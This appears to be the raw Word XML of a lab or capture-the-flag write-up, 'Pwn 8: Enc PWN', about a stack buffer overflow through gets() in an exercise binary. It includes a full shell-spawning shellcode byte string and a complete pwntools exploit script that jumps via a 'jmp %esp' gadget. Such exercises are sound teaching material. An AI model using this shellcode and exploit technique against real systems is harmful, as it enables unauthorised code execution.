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7825927734375" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>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0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:strike w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="51.98999786376953"/>
          <w:szCs w:val="51.98999786376953"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pwn 8: Enc PWN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763671875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="12.534332275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need to answer to the following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93.864593505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What is the goal of the exercise?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76.2725830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What is the entry point that allows us to reach our goal?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13.853607177734375" w:right="15.068359375" w:firstLine="1.09954833984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program executes some bash functions and, if the user inserts a command contained in the list of 'executable' commands, this will be executed. From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if-else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block defined in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 can notice that the only command that it is allowed is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defined on the function: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34.5133972167969"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void run_command_ls()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448.1361389160156"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system("ls");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13.6228942871094"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13.6228942871094" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="21.989999771118164"/>
          <w:szCs w:val="21.98999977111816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But we can also notice the function lol, that let us execute what’s on the stack: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0"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void lol()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0"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ab/>
        <w:t xml:space="preserve">__asm__("jmp %esp");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0"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Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="21.989999771118164"/>
          <w:szCs w:val="21.98999977111816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24.40887451171875" w:right="22.652587890625" w:hanging="3.9581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goal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to have full access to the bash commands, and the vulnerability we can exploit is provided by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gets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over a 32-byte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buffer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Here we can do a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shellcode attack</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5.612945556640625" w:right="24.454345703125" w:hanging="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first need to find the offset to reach the return address in order to inject our code. Let’s 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gdb</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5.95622062683105" w:lineRule="auto"/>
        <w:ind w:left="14.953155517578125" w:right="17.672119140625" w:firstLine="12.9740905761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First, we need to create the pattern that causes the segmentation fault of our program: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695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95325"/>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gives us the following trace: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4318656921387" w:lineRule="auto"/>
        <w:ind w:left="27.92724609375" w:right="1082.672119140625" w:firstLine="1001.96823120117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638675" cy="333091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38675" cy="3330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Finally, we can have the information about the return address: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532226562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600575" cy="3009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005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7.8118896484375" w:right="17.1630859375" w:hanging="2.858734130859375"/>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offset to EIP is equal to 44. We can now search for a “decent” (proper) shellcode for this architecture. For example, on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http://shell-storm.org/shellcode/</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 can find the following one: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12.75421142578125" w:right="69.298095703125" w:hanging="2.638854980468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\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\ x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80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12.75421142578125" w:right="69.298095703125" w:hanging="2.63885498046875"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="19.989999771118164"/>
          <w:szCs w:val="19.989999771118164"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="21.989999771118164"/>
          <w:szCs w:val="21.989999771118164"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From what we saw using the pattern, we can replace the return address with the address of the lol function, and inject the shellcode right after, since it will go into the stack and the lol function will execute it.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12.75421142578125" w:right="69.298095703125" w:hanging="2.63885498046875"/>
        <w:jc w:val="left"/>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8527221679688"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from pwn import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736.7123413085938"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elf = ELF('./pwn2')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736.272583007812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of</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="21.989999771118164"/>
          <w:szCs w:val="21.989999771118164"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">f</w:t>
      </w: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set = 44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692.2926330566406"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junk = b'a' * of</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i w:val="1"/>
          <w:sz w:val="21.989999771118164"/>
          <w:szCs w:val="21.989999771118164"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">f</w:t>
      </w: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45.7283020019531"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 http://shell-storm.org/shellcode/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5.46804428100586" w:lineRule="auto"/>
        <w:ind w:left="728.1362915039062" w:right="0" w:hanging="10.1153564453125"/>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shellcode = b"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"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738.9114379882812"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target_address = p32(elf.symbols['lol'])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705.9263610839844"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p = process('./pwn2')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33.6337280273438"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msgin = junk + target_address + shellcode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05.9263610839844"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p.sendline(msgin)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705.9263610839844"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p.interactive()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70751953125" w:line="272.7422904968262" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="23.21533203125" w:firstLine="12.534332275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 the overflow we write the shell code on the stack, and thanks to the function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lol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can jump to the right position.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1650" w:top="1380" w:left="1430.1045227050781" w:right="1392.32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